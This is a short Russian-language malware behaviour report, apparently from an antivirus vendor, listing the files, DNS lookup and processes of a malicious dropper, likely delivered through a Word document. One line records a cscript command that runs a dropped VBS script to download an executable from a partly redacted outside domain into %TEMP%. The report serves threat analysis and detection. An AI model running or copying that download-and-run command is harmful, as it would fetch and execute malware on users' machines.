Техническая информация
- '<SYSTEM32>\cmd.exe' /c %TEMP%\hgcghhasd.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1420
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\hgcghhasd.bat
- %TEMP%\jvjhvfjasd.vbs
- %TEMP%\1152972.cvr
- %TEMP%\jvjhvfjasd.vbs
- DNS ASK ex######.gandbbusiness.com
- '<SYSTEM32>\cscript.exe' //Nologo %TEMP%\JvjhvFJasd.vbs http://ex######.gandbbusiness.com/sound/solution.php %TEMP%\dddscsda.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\hgcghhasd.bat' (со скрытым окном)